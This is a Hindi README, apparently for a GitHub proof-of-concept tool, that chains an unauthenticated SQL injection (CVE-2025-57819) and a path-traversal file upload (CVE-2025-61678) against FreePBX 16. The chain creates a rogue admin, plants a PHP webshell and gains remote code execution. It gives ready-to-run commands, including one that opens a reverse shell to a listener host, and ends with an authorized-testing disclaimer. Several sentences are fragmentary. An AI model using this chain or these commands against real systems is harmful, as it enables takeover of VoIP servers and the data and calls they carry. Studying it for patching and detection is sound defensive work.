
FreePBX 16 के लिए अनप्रमाणित SQL इंजेक्शन और मनमाना फ़ाइल अपलोड एक्सप्लॉइट श्रृंखला, व्यवस्थापक निर्माण और वेबशेल तैनाती के माध्यम से रिमोट कोड निष्पादन प्राप्त करना।
| CVE | घटक | प्रभाव |
|---|
| CVE-2025-57819 | एंडपॉइंट मॉड्यूल लोडर (brand पैरामीटर) | अप्रमाणित स्टैक्ड SQL इंजेक्शन |
| CVE-2025-61678 | एंडपॉइंट मैनेजर फर्मवेयर अपलोडर (fwbrand पैरामीटर) | प्रमाणित मनमाना फ़ाइल अपलोड (पथ ट्रैवर्सल) |
ampusers तालिका में सीधे एक नए पूर्ण-पहुंच व्यवस्थापक को INSERT करने के लिए किया जाता है।fwbrand में ../../../var/www/html/<dir> ट्रैवर्सल के साथ किया जाता है ताकि वेब रूट में एक PHP वेबशेल लिखा जा सके।FreePBX 16 (एंडपॉइंट मॉड्यूल 16.0.92 से पहले)। 17.0.6 में भी पैच किया गया। एक निश्चित रिलीज़ में अपडेट करें।
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| फ्लैग | विवरण |
|---|---|
--rhost | लक्ष्य होस्ट (आवश्यक) |
--rport | लक्ष्य पोर्ट (डिफ़ॉल्ट 443) |
--http | HTTPS के बजाय HTTP का उपयोग करें |
--lhost / --lport | रिवर्स-शेल कॉलबैक पता |
--command | शेल के बजाय एक एकल कमांड चलाएं |
pip install requests pwntools
केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · अप्रमाणित SQL इंजेक्शन · स्टैक्ड क्वेरी इंजेक्शन · एंडपॉइंट मॉड्यूल · एंडपॉइंट मैनेजर · प्रमाणित फ़ाइल अपलोड · पथ ट्रैवर्सल · रिमोट कोड निष्पादन · RCE · PoC · एक्सप्लॉयट · VoIP सुरक्षा
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb